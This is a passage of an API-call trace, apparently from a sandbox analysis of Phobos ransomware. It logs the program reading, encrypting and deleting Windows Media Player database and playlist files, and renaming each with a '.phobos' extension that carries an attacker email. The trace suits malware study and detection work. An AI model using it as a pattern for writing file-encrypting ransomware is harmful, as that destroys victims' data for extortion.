(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0206.641] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1069056) returned 1 [0206.641] CloseHandle (hObject=0xac) returned 1 [0206.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb")) returned 0x2020 [0206.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0206.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0206.641] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0206.641] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0206.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0206.642] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0206.642] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0206.642] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x105000, lpOverlapped=0x0) returned 1 [0207.047] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x105010, dwBufLen=0x105010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x105010) returned 1 [0207.058] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x105010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x105010, lpOverlapped=0x0) returned 1 [0207.089] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.089] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.089] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0207.089] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.089] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0207.089] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.089] CloseHandle (hObject=0xac) returned 1 [0207.089] CloseHandle (hObject=0x10c) returned 1 [0207.089] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb")) returned 1 [0207.090] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.091] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1279) returned 1 [0207.091] CloseHandle (hObject=0x10c) returned 1 [0207.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl")) returned 0x2020 [0207.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.092] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.092] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.092] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.092] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.092] ReadFile (in: hFile=0x10c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4ff, lpOverlapped=0x0) returned 1 [0207.146] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0207.146] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0207.147] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.147] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.147] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0207.147] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.147] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0207.147] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.147] CloseHandle (hObject=0x10c) returned 1 [0207.147] CloseHandle (hObject=0xac) returned 1 [0207.147] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl")) returned 1 [0207.148] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.149] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1267) returned 1 [0207.149] CloseHandle (hObject=0xac) returned 1 [0207.149] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl")) returned 0x2020 [0207.149] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.149] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.149] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.150] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.150] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.150] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4f3, lpOverlapped=0x0) returned 1 [0207.152] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0207.152] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0207.153] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.153] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.153] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0207.153] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.153] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0207.153] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.153] CloseHandle (hObject=0xac) returned 1 [0207.153] CloseHandle (hObject=0x10c) returned 1 [0207.153] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl")) returned 1 [0207.154] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.163] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1284) returned 1 [0207.163] CloseHandle (hObject=0x10c) returned 1 [0207.163] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl")) returned 0x2020 [0207.163] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.163] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.163] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.291] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.291] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.291] ReadFile (in: hFile=0x10c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x504, lpOverlapped=0x0) returned 1 [0207.356] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510, dwBufLen=0x510 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510) returned 1 [0207.356] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x510, lpOverlapped=0x0) returned 1 [0207.363] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.363] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.363] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0207.363] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.363] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0207.363] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.363] CloseHandle (hObject=0x10c) returned 1 [0207.363] CloseHandle (hObject=0xac) returned 1 [0207.363] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl")) returned 1 [0207.364] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.366] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1025) returned 1 [0207.366] CloseHandle (hObject=0xac) returned 1 [0207.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl")) returned 0x2020 [0207.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.366] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.366] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.367] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.367] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.367] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x401, lpOverlapped=0x0) returned 1 [0207.372] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x410, dwBufLen=0x410 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x410) returned 1 [0207.372] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x410, lpOverlapped=0x0) returned 1 [0207.373] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.373] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.373] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0207.373] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.373] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0207.373] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.373] CloseHandle (hObject=0xac) returned 1 [0207.373] CloseHandle (hObject=0x10c) returned 1 [0207.373] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl")) returned 1 [0207.374] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 